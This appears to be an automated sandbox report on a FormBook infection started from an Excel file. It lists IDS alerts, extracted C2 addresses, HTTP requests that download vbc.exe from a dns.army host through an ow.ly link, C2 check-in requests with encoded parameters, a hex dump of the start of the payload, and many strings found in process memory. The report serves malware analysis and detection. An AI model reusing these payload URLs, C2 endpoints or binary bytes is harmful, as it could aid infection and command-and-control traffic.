Source: Traffic	Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.22:49169 -> 34.102.136.180:80

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.aone223.com/67d/

Connects to a URL shortener service

Show sources

Source: unknown

DNS query: name: ow.ly

Source: global traffic

HTTP traffic detected: HTTP/1.1 200 OKDate: Tue, 23 Feb 2021 10:34:27 GMTServer: Apache/2.4.46 (Win64) OpenSSL/1.1.1h PHP/7.2.34Last-Modified: Tue, 23 Feb 2021 06:43:59 GMTETag: "a7e00-5bbfb3e41a257"Accept-Ranges: bytesContent-Length: 687616Keep-Alive: timeout=5, max=100Connection: Keep-AliveContent-Type: application/x-msdownloadData Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 50 45 00 00 4c 01 03 00 b9 a3 34 60 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 30 00 00 74 0a 00 00 08 00 00 00 00 00 00 da 93 0a 00 00 20 00 00 00 a0 0a 00 00 00 40 00 00 20 00 00 00 02 00 00 04 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 00 e0 0a 00 00 02 00 00 00 00 00 00 02 00 40 85 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 00 00 00 00 00 00 00 00 88 93 0a 00 4f 00 00 00 00 a0 0a 00 bc 05 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c0 0a 00 0c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 08 00 00 00 00 00 00 00 00 00 00 00 08 20 00 00 48 00 00 00 00 00 00 00 00 00 00 00 2e 74 65 78 74 00 00 00 e0 73 0a 00 00 20 00 00 00 74 0a 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 00 00 60 2e 72 73 72 63 00 00 00 bc 05 00 00 00 a0 0a 00 00 06 00 00 00 76 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 40 2e 72 65 6c 6f 63 00 00 0c 00 00 00 00 c0 0a 00 00 02 00 00 00 7c 0a 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 42 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc 93 0a 00 00 00 00 00 48 00 00 00 02 00 05 00 2c 5b 01 00 84 e8 01 00 03 00 00 00 d4 00 00 06 b0 43 03 00 d8 4f 07 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 fa 02 14 7d 01 00 00 04 02 28 15 00 00 0a 00 00 02 28 07 00 00 06 00 02 7b 09 00 00 04 72 01 00 00 70 7e 2f 00 00 04 28 16 00 00 0a 6f 17 00 00 0a 00 02 7b 06 00 00 04 6f 18 00 00 0a 26 2a 00 1b 30 01 00 1d 00 00 00 01 00 00 11 00 00 72 13 00 00 70 28 19 00 00 0a 26 00 de 0c 0a 00 06 6f 1a 00 00 0a 26 00 de 00 2a 00 00 00 01 10 00 00 00 00 01 00 0f 10 00 0c 19 00 00 01 6e 00 03 74 14 00 00 01 16 6f 1b 00 00 0a 00 02 7b 06 00 00 04 6f 18 00 00 0a 26 2a 2e 00 02 03 14 28 03 00 00 06 00 2a 7e 00 02 7b 06 00 00 04 6f 1c 00 00 0a 00 02 7b 06 00 00 04 6f 1d 00 00 0a 28 1e 00 00 0a 00 2a 13 30 02 00 2b 00 00 00 02 00 00 11 00 03 2c 0b 02 7b 01 00 00 04 14 fe 03 2b 01 16 0a 06 2c 0e 00 02 7b 01 00 00 04 6f 1f 00 00 0a 00 00 02 03 28 20 00 00 0a 00 2a 00 13 30 06 00 aa 06 00 00 03 00 00 11 00 02 73 21 00 00 0a 7d 01 00 00 04 d0 02 00 00 02 28 22 00 00 0a 73 23 00 00 0a 0a 02 73 24 0

Source: global traffic	HTTP traffic detected: GET /67d/?cDK=Q0JFvHbbV3aA7SwyaLinIDYx2yT6hkhQohmp5i+qhLfSEfFe3Vda4XF7USYP2N9+mGRMxQ==&PBR=dpddZ HTTP/1.1Host: www.priority1fleet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /67d/?cDK=IAj2p4O1jtMDA38vgzfl4HFMdfHNof0Kad5Noufyf5YlrFTK7f2GvawlXOZGdPFW7uU/5g==&PBR=dpddZ HTTP/1.1Host: www.quallateematerial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /67d/?cDK=W2Z2UcqSFcwA3YJY0Xi1zX0akAe1ObC272eZaT9vn/sHgfwkHiKnNOLEeBBq/HqgrL2ZGA==&PBR=dpddZ HTTP/1.1Host: www.hattonpalacejewellery.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View	IP Address: 52.58.78.16 52.58.78.16
Source: Joe Sandbox View	IP Address: 216.239.32.21 216.239.32.21
Source: Joe Sandbox View	IP Address: 216.239.32.21 216.239.32.21

Source: Joe Sandbox View	ASN Name: AMAZON-02US AMAZON-02US
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS
Source: Joe Sandbox View	ASN Name: GOOGLEUS GOOGLEUS

Source: global traffic	HTTP traffic detected: GET /8O6j30rxT69 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ow.lyConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /receipst/vbc.exe?platform=hootsuite HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: msnsndstdyyemkemafgk.dns.army

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\18EE8C7E.emf

Jump to behavior

Source: global traffic	HTTP traffic detected: GET /8O6j30rxT69 HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: ow.lyConnection: Keep-Alive
Source: global traffic	HTTP traffic detected: GET /receipst/vbc.exe?platform=hootsuite HTTP/1.1Accept: /Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Connection: Keep-AliveHost: msnsndstdyyemkemafgk.dns.army
Source: global traffic	HTTP traffic detected: GET /67d/?cDK=Q0JFvHbbV3aA7SwyaLinIDYx2yT6hkhQohmp5i+qhLfSEfFe3Vda4XF7USYP2N9+mGRMxQ==&PBR=dpddZ HTTP/1.1Host: www.priority1fleet.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /67d/?cDK=IAj2p4O1jtMDA38vgzfl4HFMdfHNof0Kad5Noufyf5YlrFTK7f2GvawlXOZGdPFW7uU/5g==&PBR=dpddZ HTTP/1.1Host: www.quallateematerial.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic	HTTP traffic detected: GET /67d/?cDK=W2Z2UcqSFcwA3YJY0Xi1zX0akAe1ObC272eZaT9vn/sHgfwkHiKnNOLEeBBq/HqgrL2ZGA==&PBR=dpddZ HTTP/1.1Host: www.hattonpalacejewellery.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.facebook.com/favicon.ico</FavoriteIcon> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.myspace.com/favicon.ico</FavoriteIcon> equals www.myspace.com (Myspace)
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <FavoriteIcon>http://www.rambler.ru/favicon.ico</FavoriteIcon> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.facebook.com/</URL> equals www.facebook.com (Facebook)
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: <URL>http://www.rambler.ru/</URL> equals www.rambler.ru (Rambler)
Source: explorer.exe, 00000006.00000000.2168635423.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)

Source: unknown

DNS traffic detected: queries for: ow.ly

Source: explorer.exe, 00000006.00000000.2180147925.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://%s.com
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://amazon.fr/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ariadna.elmundo.es/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://arianna.libero.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://asp.usatoday.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://auone.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2180147925.000000000A330000.00000008.00000001.sdmp	String found in binary or memory: http://auto.search.msn.com/response.asp?MT=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://br.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://browse.guardian.co.uk/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.buscape.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.estadao.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.igbusca.com.br//app/static/images/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.orange.es/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busca.uol.com.br/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.lycos.es/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com.br/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscador.terra.es/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ozu.es/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://buscar.ya.com/
Source: raserver.exe, 00000007.00000002.2353667108.0000000002B2F000.00000004.00000001.sdmp	String found in binary or memory: http://business.google.com/
Source: raserver.exe, 00000007.00000002.2353667108.0000000002B2F000.00000004.00000001.sdmp	String found in binary or memory: http://business.google.com/website/quallatee-material/67d/
Source: raserver.exe, 00000007.00000002.2353667108.0000000002B2F000.00000004.00000001.sdmp	String found in binary or memory: http://business.google.com/website/quallatee-material/67d/"
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://busqueda.aol.com.mx/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cerca.lycos.it/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cgi.search.biglobe.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://clients5.google.com/complete/search?hl=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnet.search.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://cnweb.search.live.com/results.aspx?q=
Source: vbc.exe, raserver.exe, 00000007.00000002.2352947672.00000000003E0000.00000004.00000001.sdmp, vbc.exe.2.dr	String found in binary or memory: http://code.google.com/feeds/p/topicalmemorysystem/downloads/basic.xml
Source: vbc.exe, vbc.exe, 00000005.00000002.2192908833.0000000000D32000.00000020.00020000.sdmp, raserver.exe, 00000007.00000002.2352947672.00000000003E0000.00000004.00000001.sdmp, vbc.exe.2.dr	String found in binary or memory: http://code.google.com/p/topicalmemorysystem/
Source: explorer.exe, 00000006.00000000.2170234716.0000000004B50000.00000002.00000001.sdmp	String found in binary or memory: http://computername/printers/printername/.printer
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://corp.naukri.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://de.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.ask.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://es.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://esearch.rakuten.co.jp/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espanol.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://espn.go.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://find.joins.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://fr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://google.pchome.com.tw/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://home.altervista.org/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie.search.yahoo.com/os?command=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ie8.ebay.com/open-search/output-xml.php?q=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://image.excite.co.jp/jp/favicon/lep.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.joins.com/ui_c/fvc_joins.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://images.monster.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.atlas.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://img.shopzilla.com/shopzilla/shopzilla.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://in.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2168635423.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com
Source: explorer.exe, 00000006.00000000.2168635423.0000000003C40000.00000002.00000001.sdmp	String found in binary or memory: http://investor.msn.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.dada.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://it.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://jobsearch.monster.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://kr.search.yahoo.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://list.taobao.com/browse/search_visual.htm?n=15&q=
Source: explorer.exe, 00000006.00000000.2169159950.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XML.asp
Source: explorer.exe, 00000006.00000000.2169159950.0000000003E27000.00000002.00000001.sdmp	String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://mail.live.com/?rru=compose%3Fsubject%3D
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://msk.afisha.ru/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ocnsearch.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://openimage.interpark.com/interpark.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://p.zhongsou.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://price.ru/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.linternaute.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://recherche.tf1.fr/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://rover.ebay.com
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://ru.search.yahoo.com
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://sads.myspace.com/
Source: explorer.exe, 00000006.00000000.2163666478.0000000001C70000.00000002.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search-dyn.tiscali.it/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.about.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.alice.it/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.co.uk/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.aol.in/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.atlas.cz/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auction.co.kr/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.auone.jp/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.books.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.centrum.cz/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.chol.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.cn.yahoo.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.daum.net/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.dreamwiz.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.co.uk/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.de/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.es/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.fr/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.in/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ebay.it/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.empas.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.espn.go.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gamer.com.tw/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.gismeteo.ru/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.goo.ne.jp/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.hanafos.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.interpark.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.ipop.co.kr/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=IEFM1&q=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SO2TDF&q=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?FORM=SOLTDF&q=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.live.com/results.aspx?q=
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.livedoor.com/favicon.ico
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.co.uk/
Source: explorer.exe, 00000006.00000000.2180739534.000000000A3E9000.00000008.00000001.sdmp	String found in binary or memory: http://search.lycos.com/
